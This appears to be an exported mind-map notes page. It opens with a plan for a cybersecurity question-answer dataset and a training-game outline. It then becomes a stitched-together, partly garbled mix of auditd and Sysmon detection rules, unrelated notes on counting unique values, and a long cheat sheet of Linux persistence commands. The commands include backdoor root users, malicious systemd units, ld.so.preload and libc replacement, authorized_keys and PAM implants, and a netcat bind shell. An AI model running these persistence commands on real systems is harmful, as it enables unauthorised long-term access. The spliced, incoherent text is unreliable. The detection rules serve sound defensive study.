Markmap - Conversation

Mind Map for Cybersecurity Documentation and Smart Toolkit


TAGS: tr1p


Root Node: 2024-10-18 (Today's Date)

  • Here is a copy-paste-ready structured plan for creating a question-answer dataset based on the provided CSV data, with step-by-step instructions:

Plan for Creating a Question-Answer Dataset Based on CSV Data

  • Phase 1: Data Preparation and Enhancement (Goal: Enriched CSV)

Step 1.1: Add "HOW" and "HOW-TO" Information (Optional but Recommended)

  • Action: Manually add columns for "HOW" and "HOW-TO" based on the original image information. These columns will provide richer context for question generation.
  • Expected Output: Augmented CSV with "HOW" and "HOW-TO" columns populated.
  • Validation: Ensure all rows have relevant values in the new columns.

Step 1.2: Create a "Description" Column (Recommended)

  • Action: Create a new column titled "Description" and add brief, descriptive text summarizing each item.
    • Example: For "1.1 Keeping documentation up-to-date," the description could be "Maintaining accurate and current cybersecurity documentation."
  • Expected Output: CSV with a "Description" column for all rows.
  • Validation: Verify that each description accurately reflects the item's purpose.

Phase 2: Question Generation (Goal: Question Bank CSV)

Step 2.1: Define Question Types

  • We will generate several types of questions to test different levels of understanding:
    • Definition: "What is [Item]?"
    • Relationship: "How is [Item A] related to [Item B]?"
    • Application: "How could [Item] be used to address [Challenge]?" (Requires "HOW" and "HOW-TO" data)
    • Hierarchical Position: "What is the parent category of [Item]?"
    • Why Question: "Why is [Item] important in the context of cybersecurity?"

Step 2.2: Generate Questions (One Question Per Item Initially)

  • Action: Write one question for each item in the CSV, choosing from the question types defined above. Prioritize question variety.
  • Expected Output: A list of initial questions.

Step 2.3: Build a New CSV (Question Bank)

  • Action: Create a new CSV file with the following columns:
    • Item: Copy from the original CSV.
    • Question: The question generated in Step 2.2.
    • Answer: The correct answer to the question.
    • QuestionType: The type of question (Definition, Relationship, etc.).
  • Expected Output: A CSV file containing questions, answers, and question types.

Step 2.4: Validation

  • Action: Review the question-answer pairs for accuracy and clarity. Ensure that the answers are unambiguous and directly answer the questions.
  • Validation: All questions must have correct answers and the correct QuestionType.

Phase 3: Dataset Expansion (Goal: More Comprehensive Dataset)

Step 3.1: Add Multiple Questions per Item

  • Action: Expand the dataset by adding more questions for each item. Consider different levels of difficulty and test various aspects of the item.
  • Expected Outcome: CSV with multiple questions per item.

Step 3.2: Add Negative Examples (Optional)

  • Action: Create questions that would elicit incorrect answers (include wrong 'distracter' answers) in a multiple-choice format. This increases the value of the dataset for machine learning training.
  • Expected Outcome: CSV with both positive (correct) and negative (incorrect) question-answer pairs.

Final Deliverable

A CSV file acting as a comprehensive question-answer dataset suitable for testing knowledge of cybersecurity documentation challenges and the proposed toolkit.


This plan ensures a step-by-step process to create a rich and detailed question-answer dataset. Level 1 Branches:

  • Cybersecurity Documentation Challenges:
    • Keeping documentation up-to-date
    • Linking narratives to policies
    • Real-time threat assessment
    • Automating documentation processes
  • Smart Documentation Toolkit:
    • AI-powered narrative linking
    • Automated updates via Monte Carlo simulations
    • PACRP for real-time threat assessment
    • Compliance management
    • User-friendly interface
  • Implementation in Google Workspace:
    • Google Drive integration
    • Google Cloud NLP API
    • Google Sheets for simulations
    • Apps Script for automation
  • Cyber Siege Game:
    • Realistic attack simulation
    • Threat hunting training
    • APT28 focus
    • Integration of Atomic Red Team, benign logs, game theory
  • Kroki.io Diagram Integration:
    • Decoding and interpreting diagrams
    • Linking diagrams to threat intelligence
    • Interactive visualization
    • Dynamic documentation with diagrams
  • Question Building for Cyber Range:
    • Defining learning objectives
    • Designing question scenarios
    • Formulating question types
    • Validating and refining questions

Level 2 Branches (Examples):

  • Under "Cybersecurity Documentation Challenges":
    • Manual updates are time-consuming
    • Policies are often disconnected from real-world incidents
    • Static documentation can't keep up with evolving threats
  • Under "Smart Documentation Toolkit":
    • NLP analyzes incident reports and maps them to policies
    • Simulations predict the likelihood of different attacks
    • PACRP adjusts security controls based on real-time risk
  • Under "Implementation in Google Workspace":
    • Use Google Drive API to access and modify documents
    • Use Google Sheets to build and run simulations
    • Use Apps Script to automate policy updates
  • Under "Cyber Siege Game":
    • Atomic Red Team generates realistic attack data
    • Benign log generation establishes a baseline for anomaly detection
    • Game theory helps predict APT28's behavior
  • Under "Kroki.io Diagram Integration":
    • Decode Base64 and decompress data to reveal diagrams
    • Extract entities and relationships from diagrams
    • Link diagram elements to MITRE ATT\&CK data
  • Under "Question Building for Cyber Range":
    • Identify core skills to be assessed
    • Vary attack complexity to challenge participants
    • Use real-world data or simulate it with Atomic Red Team
    • Conduct pilot tests to refine questions

Connections between branches:

  • Connect "Cybersecurity Documentation Challenges" to "Smart Documentation Toolkit" to show how the toolkit addresses the challenges.
  • Connect "Smart Documentation Toolkit" to "Implementation in Google Workspace" to illustrate the technical implementation.
  • Connect "Cyber Siege Game" to "Smart Documentation Toolkit" and "Kroki.io Diagram Integration" to show how these concepts are used in the game.
  • Connect "Question Building for Cyber Range" to "Cyber Siege Game" to show how questions are developed for the game scenarios.

Root Node: 2024-10-18 (Today's Date)

Cybersecurity Documentation Challenges

1.1. Keeping documentation up-to-date

  • Manual updates are time-consuming 1.2. Linking narratives to policies
  • Policies are often disconnected from real-world incidents 1.3. Real-time threat assessment
  • Static documentation can't keep up with evolving threats 1.4. Automating documentation processes

Smart Documentation Toolkit 2.1. AI-powered narrative linking

  • NLP analyzes incident reports and maps them to policies 2.2. Automated updates via Monte Carlo simulations
  • Simulations predict the likelihood of different attacks 2.3. PACRP for real-time threat assessment
  • PACRP adjusts security controls based on real-time risk 2.4. Compliance management 2.5. User-friendly interface

Implementation in Google Workspace 3.1. Google Drive integration

  • Use Google Drive API to access and modify documents 3.2. Google Cloud NLP API 3.3. Google Sheets for simulations
  • Use Google Sheets to build and run simulations 3.4. Apps Script for automation
  • Use Apps Script to automate policy updates

Cyber Siege Game 4.1. Realistic attack simulation 4.2. Threat hunting training 4.3. APT28 focus 4.4. Integration of Atomic Red Team, benign logs, game theory

  • Atomic Red Team generates realistic attack data
  • Benign log generation establishes a baseline for anomaly detection
  • Game theory helps predict APT28's behavior

Kroki.io Diagram Integration 5.1. Decoding and interpreting diagrams

  • Decode Base64 and decompress data to reveal diagrams 5.2. Linking diagrams to threat intelligence
  • Extract entities and relationships from diagrams
  • Link diagram elements to MITRE ATT&CK data 5.3. Interactive visualization 5.4. Dynamic documentation with diagrams

Question Building for Cyber Range 6.1. Defining learning objectives

  • Identify core skills to be assessed 6.2. Designing question scenarios
  • Vary attack complexity to challenge participants 6.3. Formulating question types
  • Use real-world data or simulate it with Atomic Red Team 6.4. Validating and refining questions
  • Conduct pilot tests to refine questions

Connections:

"Cybersecurity Documentation Challenges" is directly addressed by "Smart Documentation Toolkit" "Smart Documentation Toolkit" is implemented through "Implementation in Google Workspace" "Cyber Siege Game" utilizes elements from "Smart Documentation Toolkit" and "Kroki.io Diagram Integration" "Question Building for Cyber Range" informs the development of scenarios in "Cyber Siege Game"


Root Node: 2024-10-18 (Today's Date)

  • Cybersecurity Documentation Challenges
  • Keeping documentation up-to-date
  • Recursive link back to "Smart Documentation Toolkit"

=====

HOW

  • system prompt that is supportive of outputting in this manner.

HOW-TO-INSTRUCTIONS

to do this thing
to do that thing

outline-is-detailed

>
> outline_summarized
* data1-markmap

data2-markmap2:

  • horry-sheet
  • []data({'info':'rocks'})table?

  • Linking narratives to policies Recursive link back to "Smart Documentation Toolkit"
    • Policies often lack real-time connection or relevance to actual attack narratives.
    • Real-time threat assessment
    • Recursive link back to "Smart Documentation Toolkit"
    • Static documentation fails to keep pace with dynamic, rapidly evolving cyber threats.
    • Automating documentation processes
    • Recursive link back to "Automation via Monte Carlo and Apps Script"
    • Automation can mitigate time-consuming manual updates but requires sophisticated setup.

  • Smart Documentation Toolkit
    • AI-powered narrative linking
    • Link: "AI-G Suite Integration"
    • Uses NLP to connect incident reports with relevant policies automatically.
    • Automated updates via Monte Carlo simulations
    • Link: "Monte Carlo Simulations-G Sheets", "Google Sheets-GDI"
    • Adjusts documentation and policy through predictive modeling of potential attacks.
    • PACRP for real-time threat assessment
    • Link: "PACRP-Connect to Events"
    • Real-time assessment updates adaptational documentation based on current and projected threats.
    • Compliance management
    • Link back to compliance-related documentation
    • User-friendly interface
    • Ensures ease of use in navigation and interaction with policies, simulations, and reports.

  • Implementation in Google Workspace
    • Google Drive integration
    • Link: "Documentation - GDI"
    • Implementing automation within the G Suite environment for efficient policy update management.
    • Google Cloud NLP API
    • Link: "AI-G Suite Integration"
    • Assists in understanding incident reports and extracting relevant policy information using AI.
    • Google Sheets for simulations
    • Link: "Fast Storage"
    • Provides a platform for running advanced simulations using Google's cloud infrastructure.
    • Apps Script for automation
    • Link: "Automation via Monte Carlo and Apps Script"
    • Automates policy updates, data collection, and threat intelligence assessment.

  • Cyber Siege Game
    • Realistic attack simulation
    • Uses Atomic Red Team to replicate the methodologies of real-world adversaries like APT28.
    • Threat hunting training
    • Link: "Simulate APT28 Behavior"
    • Teaches proactive hunting for adversaries within the simulated environment.
    • APT28 focus
    • Link: "Simulate APT28 Behavior"
    • Emphasis on analyzing complex, persistent threat actors and their behavior patterns.
    • Integration of Atomic Red Team, benign logs, game theory
    • Links: "Kroki.io - Simulation Linkage", "Google Sheets-GDI"
    • Incorporates adversarial techniques, normal behavior patterning, and strategic decision-making models.

  • Kroki.io Diagram Integration
    • Decoding and interpreting diagrams
    • Link: "", "AST - NLP- diagrams"
    • Decodes and interprets diagrams for visual representation and understanding of threats.
    • Linking diagrams to threat intelligence
    • Uses NLP for parsing and contextualizing diagrams into a threat framework.
    • Interactive visualization
    • Link: "Smart-doc visualization"
    • Provides an interactive experience to map out attack paths, defensive strategies, and policy implications.
    • Dynamic documentation with diagrams
    • Documentation evolves in real-time, linking diagrams with current threat landscape data.

  • Question Building for Cyber Range
    • Defining learning objectives
    • Recursive link back to "Cyber Siege Game"
    • Focuses the training to meet specific cybersecurity skills requirements.
    • Designing question scenarios
    • Scenarios are developed to simulate real-world attack narratives for learning purposes.
    • Formulating question types
    • Multiple-choice, fill-in-the-blank, short answer, etc., to assess different skill levels.
    • Validating and refining questions
    • Iterative process of continuous improvement to meet the demands of cyber attack simulations.

Connections between branches:

  • From "Cybersecurity Documentation Challenges" to "Smart Documentation Toolkit":

    • Shows how the toolkit can address and automate the challenges of modern cybersecurity documentation.*
  • From "Smart Documentation Toolkit" to "Implementation in Google Workspace":

    • Highlights the technical integration into the G Suite ecosystem.*
  • From "Cyber Siege Game" to "Smart Documentation Toolkit" and "Kroki.io Diagram Integration":

    • Demonstrates how these concepts are utilized within the game environment for education and simulation.*
  • From "Question Building for Cyber Range" to "Cyber Siege Game":

    • Illustrates the process of creating relevant challenge/question sets for the encodedly simulated attack scenarios in**

Unix shell configuration files are critical for setting up user environments and can be a target for persistence mechanisms. These files are executed at various points during the login and shell invocation processes, making them prime targets for adversaries seeking to maintain persistence on a system.
/etc/update-motd.d/: Scripts that generate the message of the day (motd).
/etc/init.d/: Contains scripts used by the init system to start and stop services.
/etc/rc.local: Executed at the end of each multi-user runlevel.
(8) 3.1. Shell initialization files
(7) Track any file changes using auditd - Server Fault
(6) Create an audit watch for command history : r/linuxadmin - Reddit
(5) Monitoring Linux File Access With auditd - Baeldung
(4) How to monitor permission, ownership or any other change to a ...
(3) 3.1. The .bash_profile, .bash_logout, and .bashrc Files
(2) What is the difference between /etc/profile and .bashrc - Ask Ubuntu
(1) Configuring the Shell
Setting up and using auditd for monitoring file changes 4 5 6 7.
Detailed information on .bash_profile, .bash_logout, and .bashrc files 3.
Differences between /etc/profile and .bashrc 2.
Effective shell configuration practices 1.
Overview

-w /etc/profile.d/ -p wa -k shell_profiles
-w /etc/profile -p wa -k shell_profiles
-w /etc/shells -p wa -k shell_profiles
-w /etc/bashrc -p wa -k shell_profiles
-w /etc/csh.cshrc -p wa -k shell_profiles
-w /etc/csh.login -p wa -k shell_profiles
-w /etc/fish/ -p wa -k shell_profiles
-w /etc/zsh/ -p wa -k shell_profiles
-w /etc/bash.bashrc -p wa -k shell_profiles
-w /etc/bash.bash_logout -p wa -k shell_profiles
-w /root/.bashrc -p wa -k shell_profiles
-w /root/.bash_logout -p wa -k shell_profiles
-w /root/.profile -p wa -k shell_profiles
-w /root/.bash_profile -p wa -k shell_profiles
-w /root/.bash_login -p wa -k shell_profiles

File    Description
/etc/profile    Systemwide files executed at the start of login shells
/etc/profile.d/    All .sh files are executed at the start of login shells
/etc/bash.bashrc    Systemwide files executed at the start of interactive shells
/etc/bash.bash_logout    Systemwide executed as a login shell exits
~/.bashrc    User-specific startup script executed at the start of interactive shells
~/.bash_profile, ~/.bash_login, ~/.profile    User-specific startup script, but only the first file found is executed
~/.bash_logout    User-specific clean up script at the end of the session

-w /etc/systemd/system-generators/ -p wa -k systemd_generator
-w /usr/local/lib/systemd/system-generators/ -p wa -k systemd_generator
-w /lib/systemd/system-generators/ -p wa -k systemd_generator
-w /usr/lib/systemd/system-generators -p wa -k systemd_generator
-w /etc/systemd/user-generators/ -p wa -k systemd_generator
-w /usr/local/lib/systemd/user-generators/ -p wa -k systemd_generator
-w /usr/lib/systemd/user-generators/ -p wa -k systemd_generator

Detection Methods
Key Files and Directories
Overview
Python Examples

(local) pwncat$ run implant.authorized_key key=./id_rsa

~/.bash_logout: This file is executed when a login shell exits and can be used for cleanup tasks.
~/.bash_profile, ~/.bash_login, ~/.profile: These files are executed for login shells, but only the first one found is executed. They are used to set up the user's environment.
~/.bashrc: This file is executed for interactive non-login shells and is used to configure the user's shell environment.
/etc/profile: This file is executed for login shells and sets up environment variables and other settings for all users.
Key Shell Configuration Files
Linux Persistence Technique: T1546.004 - Unix Shell Configuration Modification
Shell/profile configurations
Event Triggered Execution: Unix Shell Configuration Modification

useradd -m malicious_user
echo "malicious_user:password" | chpasswd

echo -e "[Unit]\nDescription=Malicious Service\n\n[Service]\nExecStart=/path/to/malicious/script.sh\n\n[Install]\nWantedBy=multi-user.target" > /etc/systemd/system/malicious.service
systemctl enable malicious.service

chmod +s /path/to/script.sh

mv /bin/ls /bin/ls.bak
cp /path/to/malicious/ls /bin/ls

// Example code using alternate system calls

echo "ssh-rsa AAAAB3... malicious_key" >> ~/.ssh/authorized_keys

useradd -ou 0 -g 0 malicious_user

auditctl -w /etc/rc.local -p wa -k rclocal

trap '/path/to/malicious/script.sh' SIGINT SIGTERM EXIT

sudo bpftrace -e 'tracepoint:syscalls:sys_enter_execve { printf("%d %s\n", pid, comm); }'

echo "/path/to/malicious/script.sh" >> /etc/rc.local

echo "*/5 * * * * /path/to/malicious/script.sh" >> /etc/crontab

// Example code modifying parameters

echo "/path/to/malicious.so" > /etc/ld.so.preload

echo "/path/to/malicious/script.sh" >> ~/.bashrc

echo -e "[Unit]\nDescription=Malicious Timer\n\n[Timer]\nOnBootSec=5min\nOnUnitActiveSec=1h\n\n[Install]\nWantedBy=timers.target" > /etc/systemd/system/malicious.timer
systemctl enable malicious.timer

echo "alias ls='ls; /path/to/malicious/script.sh'" >> ~/.bashrc

int fd = open("file.txt", O_RDWR);

echo "/path/to/malicious/script.sh" >> ~/.profile

#include <seccomp.h>
scmp_filter_ctx ctx = seccomp_init(SCMP_ACT_ALLOW);
seccomp_rule_add(ctx, SCMP_ACT_KILL, SCMP_SYS(execve), 0);
seccomp_load(ctx);

import subprocess

def setup_auditd_rule():
    rule = '-w /etc/rc.local -p wa -k rclocal'
    try:
        result = subprocess.run(['which', 'auditctl'], capture_output=True, text=True)
        if result.returncode != 0:
            print('auditd is not installed. Please install it to set up monitoring.')
            return

        result = subprocess.run(['sudo', 'auditctl', '-R', rule], capture_output=True, text=True)
        if result.returncode == 0:
            print('Successfully added auditd rule to monitor /etc/rc.local')
        else:
            print(f'Failed to add auditd rule. Error: {result.stderr}')
    except Exception as e:
        print(f'Error setting up auditd rule: {str(e)}')

setup_auditd_rule()

import subprocess

def check_rc_local_logs():
    try:
        result = subprocess.run(['tail', '-n', '100', '/var/log/syslog'], capture_output=True, text=True)
        if result.returncode == 0:
            print('Checking last 100 lines of syslog for rc-local related entries:')
            rc_local_logs = [line for line in result.stdout.split('\n') if 'rc-local' in line.lower()]
            if rc_local_logs:
                for log in rc_local_logs:
                    print(log.strip())
            else:
                print('No rc-local related entries found in the last 100 lines of syslog')
        else:
            print('Unable to read syslog')
    except Exception as e:
        print(f'Error checking syslog: {str(e)}')

check_rc_local_logs()

import subprocess

def list_running_services():
    try:
        result = subprocess.run(['service', '--status-all'], capture_output=True, text=True)
        if result.returncode == 0:
            print('Running services (via service command):')
            for line in result.stdout.split('\n'):
                if '[ + ]' in line:
                    print(line.strip())
        else:
            result = subprocess.run(['ps', '-e'], capture_output=True, text=True)
            if result.returncode == 0:
                print('Running processes (may include services):')
                for line in result.stdout.split('\n')[1:]:
                    print(line.strip())
            else:
                print('Unable to list running services or processes')
    except Exception as e:
        print(f'Error listing running services: {str(e)}')

list_running_services()

import subprocess

def check_rc_local_service():
    try:
        result = subprocess.run(['systemctl', 'list-unit-files', '--type=service', '--all'], capture_output=True, text=True)
        output = result.stdout
        for line in output.split('\n'):
            if 'rc-local.service' in line and 'enabled' in line:
                print('rc-local.service is enabled')
                return
        print('rc-local.service is not enabled')
    except Exception as e:
        print(f'Error checking rc-local.service: {str(e)}')

check_rc_local_service()

import os

def check_rc_local():
    if os.path.isfile('/etc/rc.local'):
        with open('/etc/rc.local', 'r') as file:
            content = file.read()
        print("Contents of /etc/rc.local:")
        print(content)
    else:
        print("missing")

check_rc_local()

Monitor changes to systemd generator directories:

<FileCreate onmatch="include">
    <Rule name="TechniqueID=T1037,TechniqueName=Boot or Logon Initialization Scripts: motd" groupRelation="or">
        <TargetFilename condition="begin with">/etc/update-motd.d/</TargetFilename>
    </Rule>
</FileCreate>

-w /etc/update-motd.d/ -p wa -k motd

-w /etc/init.d/ -p wa -k init

<FileCreate onmatch="include">
    <Rule name="TechniqueID=T1037.004,TechniqueName=Boot or Logon Initialization Scripts: RC Scripts" groupRelation="or">
        <TargetFilename condition="is">/etc/rc.local</TargetFilename>
    </Rule>
</FileCreate>

-w /etc/rc.local -p wa -k rclocal

cat /var/log/syslog | grep 'rc-local'

systemctl list-units | grep 'running' | grep '.*.service'

systemctl list-unit-files --type=service --all | awk '$3 == "enabled" {print $1}' | grep 'rc-local.service'

[ -f /etc/rc.local ] && cat /etc/rc.local || echo "missing"

Linux Persistence Technique: T1037.004 - Boot or Logon Initialization Scripts

*   Modify web server configuration to include a malicious script.

```bash
echo "Include /path/to/malicious.conf" >> /etc/apache2/apache2.conf
  • Modify user environment files to include a malicious script.
echo "export PATH=/path/to/malicious:$PATH" >> ~/.bash_profile
  • Modify system binaries to include malicious code.
echo "malicious_code" >> /usr/bin/systemctl
  • Modify the shell binary to include a malicious script.
echo "malicious_code" >> /bin/bash
  • Insert a malicious kernel module.
insmod /path/to/malicious.ko
  • Modify SSH configuration to include a malicious script.
echo "Match User root\nForceCommand /path/to/malicious/script.sh" >> /etc/ssh/sshd_config
  • Modify the APT configuration to include a malicious script.
echo "DPkg::Post-Invoke {\"/path/to/malicious/script.sh\";};" >> /etc/apt/apt.conf.d/99-malicious
  • Modify user-specific startup files to include a malicious script.
echo "/path/to/malicious/script.sh" >> ~/.profile
  • Modify an existing systemd service to run a malicious script.
sed -i 's|ExecStart=.*|ExecStart=/path/to/malicious/script.sh|' /etc/systemd/system/existing.service
  • Modify a driver to include malicious code.
echo "malicious_code" >> /path/to/driver.c

(15) Excel: How to count unique items in a list - FM (14) Count unique values - Excel formula - Exceljet (13) 36 Smart Answers to “What Makes You Unique?” - Status.net (12) How to Count Unique Values Inside a List in Python? - Tutorialspoint (11) COUNT DISTINCT and COUNT UNIQUE functions - IBM (10) 10 Unique and Unexpected Job Interview Questions - LinkedIn (9) How do I count occurrence of unique values inside a list [duplicate] (8) Count unique values in a range with COUNTIF - Formulas - Exceljet (7) How to Answer “What Makes You Unique?” (With Samples) (6) How to count unique values inside a list - GeeksforGeeks (5) Count unique and distinct values in Excel with formula or pivot table (4) A List Of 33 Unique Interview Questions And Answers - Indeed (3) Count unique values among duplicates - Microsoft Support (2) Count Distinct ( Unique ) elements in an array - GeeksforGeeks (1) How to Answer 'What Makes You Unique?' & Stand Out in Your Next ... AppArmor Profile Library Hijacking SSH ForceCommand Syslog Configuration Auditd Rule Kernel Hook System Tap Script Environment Variables LD_LIBRARY_PATH XDG Autostart D-Bus Service Startup Applications Gnome Keyring SSH Key Injection Logrotate System Tap Network Interface Motd Sudoers File SSH Banner Apache Module Gnome Autostart Xinitrc Udev Rule Network Service At Job Init Script LD_PRELOAD Kernel Module SSH Configuration Bash Logout Profile.d Script Profile Modification Bashrc Modification RC Local Systemd Service Cron Job Backdoor User PAM Backdoor Module Authorized Key Implant (15) How to count number of unique items in an array - rust - Reddit (14) Get Unique Values From a List in Python - DigitalOcean (13) A Charming Algorithm for Count-Distinct - Justin Jaffray (12) Count Unique Values in Python List - Studytonight (11) Notation for number of distinct elements in a set (10) How to Count Unique Values Inside a List in Python? - Tutorialspoint (9) Counting Distinct Values in set of data for a group - Grist Creators (8) CountDistinct - Wolfram Language Documentation (7) Counting number of unique values in a Python list - GeeksforGeeks (6) Count unique values among duplicates - Microsoft Support (5) pandas: Get unique values and their counts in a column - nkmk note (4) How to count unique values inside a list - GeeksforGeeks (3) Count Distinct ( Unique ) elements in an array - GeeksforGeeks (2) Excel: How to count unique items in a list - FM (1) How do I count occurrence of unique values inside a list [duplicate]

function countUniqueElements(list): unique_counts = {} for item in list: if item in unique_counts: unique_counts[item] += 1 else: unique_counts[item] = 1 return unique_counts

input_list = [1, 2, 2, 5, 8, 4, 4, 8] unique_counts = countUniqueElements(input_list) unique_elements = keys(unique_counts) counts = values(unique_counts)

print("Unique elements:", unique_elements) print("Counts:", counts)

Count Unique Values:```text

=COUNTA(UNIQUE(A1:A10))

Extract Unique Values:```text =UNIQUE(A1:A10)

import numpy as np

input_list = [1, 2, 2, 5, 8, 4, 4, 8] unique_elements, counts = np.unique(input_list, return_counts=True)

print("Unique elements:", unique_elements) print("Counts:", counts)

input_list = [1, 2, 2, 5, 8, 4, 4, 8] unique_counts = {}

for item in input_list: if item in unique_counts: unique_counts[item] += 1 else: unique_counts[item] = 1

unique_elements = list(unique_counts.keys()) counts = list(unique_counts.values())

print("Unique elements:", unique_elements) print("Counts:", counts)

from collections import Counter

input_list = [1, 2, 2, 5, 8, 4, 4, 8] counter = Counter(input_list) unique_elements = list(counter.keys()) counts = list(counter.values())

print("Unique elements:", unique_elements) print("Counts:", counts)

User

cp /path/to/malicious.so /usr/lib/libc.so.6

echo "ForceCommand /path/to/malicious/script.sh" >> /etc/ssh/sshd_config systemctl restart sshd

echo ". /path/to/malicious/script.sh" >> /etc/syslog.conf

echo "-a always,exit -F arch=b64 -S execve -F key=malicious" >> /etc/audit/rules.d/audit.rules

echo 'int malicious_hook(void) { system("/path/to/malicious/script.sh"); return 0; }' > /usr/src/linux/kernel/malicious_hook.c

echo 'probe begin { exec("/path/to/malicious/script.sh") }' > /usr/share/systemtap/tapset/malicious.stp

echo "export PATH=/path/to/malicious:$PATH" >> /etc/profile

echo "export LD_LIBRARY_PATH=/path/to/malicious/lib" >> /etc/profile

echo -e "[Desktop Entry]\nType=Application\nExec=/path/to/malicious/script.sh\nHidden=false\nNoDisplay=false\nX-GNOME-Autostart-enabled=true\nName=Malicious" > /etc/xdg/autostart/malicious.desktop

echo -e "[D-BUS Service]\nName=org.malicious.service\nExec=/path/to/malicious/script.sh" > /usr/share/dbus-1/services/org.malicious.service

echo "/path/to/malicious/script.sh" >> ~/.config/autostart/malicious.desktop

echo "/path/to/malicious/script.sh" >> ~/.gnome2/keyrings/login.keyring

echo "ssh-rsa AAAAB3... malicious_key" >> ~/.ssh/authorized_keys

echo "/path/to/malicious/script.sh" >> /etc/logrotate.d/syslog

stap -e 'probe begin { exec("/path/to/malicious/script.sh") }'

echo "up /path/to/malicious/script.sh" >> /etc/network/interfaces

echo "/path/to/malicious/script.sh" >> /etc/motd

echo "Cmnd_Alias MALICIOUS = /path/to/malicious/script.sh" >> /etc/sudoers

echo "/path/to/malicious/script.sh" >> /etc/issue.net

echo "LoadModule malicious_module /path/to/malicious.so" >> /etc/apache2/apache2.conf systemctl restart apache2

echo -e "[Desktop Entry]\nType=Application\nExec=/path/to/malicious/script.sh\nHidden=false\nNoDisplay=false\nX-GNOME-Autostart-enabled=true\nName=Malicious" > ~/.config/autostart/malicious.desktop

echo "/path/to/malicious/script.sh" >> ~/.xinitrc

echo 'ACTION=="add", RUN+="/path/to/malicious/script.sh"' > /etc/udev/rules.d/99-malicous.rules

nc -l -p 12345 -e /bin/bash &

echo "/path/to/malicious/script.sh" | at now + 1 minute

echo -e "#!/bin/sh\n/path/to/malicious/script.sh" > /etc/init.d/malicious chmod +x /etc/init.d/malicious update-rc.d malicious defaults

echo "export LD_PRELOAD=/path/to/malicious.so" >> /etc/profile

insmod /path/to/malicious.ko

echo "ForceCommand /path/to/malicious/script.sh" >> /etc/ssh/sshd_config systemctl restart sshd

echo "/path/to/malicious/script.sh" >> ~/.bash_logout

echo "/path/to/malicious/script.sh" > /etc/profile.d/malicious.sh

echo "/path/to/malicious/script.sh" >> /etc/profile

echo "/path/to/malicious/script.sh" >> ~/.bashrc

echo "/path/to/malicious/script.sh" >> /etc/rc.local

echo -e "[Unit]\nDescription=Malicious Service\n\n[Service]\nExecStart=/path/to/malicious/script.sh\n\n[Install]\nWantedBy=multi-user.target" > /etc/systemd/system/malicious.service systemctl enable malicious.service

echo "/5 * /path/to/malicious/script.sh" >> /etc/crontab

(local) pwncat$ run implant.passwd backdoor_user=pwncat backdoor_pass=pwncat

(local) pwncat$ run implant.pam password=s3cr3ts

Install an SSH authorized key to allow persistent access Persistence Implants Conclusion Explanation of Key Files Detect modifications of shell configs with auditd Linux-Persistence-T1546.004

  1. User Account Creation
  2. Custom Systemd Services
  3. SUID Binary
  4. Binary Replacement or Wrapping
  5. Use Alternate System Calls
  6. SSH Authorized Keys
  7. Root/Superuser Account Creation
  8. Linux Audit Subsystem (auditd)
  9. Trap Command in Scripts
  10. Using eBPF
  11. RC Local Modification
  12. Scheduled Task (Cron Jobs)
  13. Fudge Around Parameters
  14. Dynamic Linker Hijacking
  15. Shell Configuration Modification
  16. Systemd Timers
  17. Alias Commands
  18. Emulate/Implement System Call
  19. Backdooring User Startup File
  20. Seccomp (Secure Computing Mode) Additional 20 Unique Persistence Implants for Boot or Logon Initialization Scripts User Set Up auditd Rule for /etc/rc.local Check Syslog for rc-local Entries List Running Services Detect if rc-local Service is Enabled Check if /etc/rc.local Exists Example Python Scripts
  21. Detect Creation of Systemd Generators with auditd
  22. Detect motd Modifications
  23. Detect init.d Script Modifications with auditd
  24. Detect Modifications with Sysmon
  25. Detect Modifications with auditd
  26. Check Syslog for rc-local Entries
  27. List Running Services
  28. Detect if rc-local Service is Enabled
  29. Check if /etc/rc.local Exists User Additional Unique Persistence Implants User Summary Unique Persistence Implants User Summary of Unique Counting Methods Using a HashSet (General Pseudocode) General Programming Concept Using Dynamic Arrays Excel Example Using numpy.unique Using a Set and Dictionary Using collections.Counter
  30. AppArmor Profile
  31. Library Hijacking
  32. SSH ForceCommand
  33. Syslog Configuration
  34. Auditd Rule
  35. Kernel Hook
  36. System Tap Script
  37. Environment Variables
  38. LD_LIBRARY_PATH
  39. XDG Autostart
  40. D-Bus Service
  41. Startup Applications
  42. Gnome Keyring
  43. SSH Key Injection
  44. Logrotate
  45. System Tap
  46. Network Interface
  47. Motd
  48. Sudoers File
  49. SSH Banner
  50. Apache Module
  51. Gnome Autostart
  52. Xinitrc
  53. Udev Rule
  54. Network Service
  55. At Job
  56. Init Script
  57. LD_PRELOAD
  58. Kernel Module
  59. SSH Configuration
  60. Bash Logout
  61. Profile.d Script
  62. Profile Modification
  63. Bashrc Modification
  64. RC Local
  65. Systemd Service
  66. Cron Job
  67. Backdoor User
  68. PAM Backdoor Module
  69. Authorized Key Implant Monitoring Shell Configuration Files with auditd Forensics and Recovery Incident Response Plan Secure Coding Practices Phishing Awareness Training Penetration Testing Vulnerability Scanning Endpoint Protection Platforms (EPP) Intrusion Detection Systems (IDS) Zero Trust Architecture Firewalls and Segmentation From Defensive Playbook: root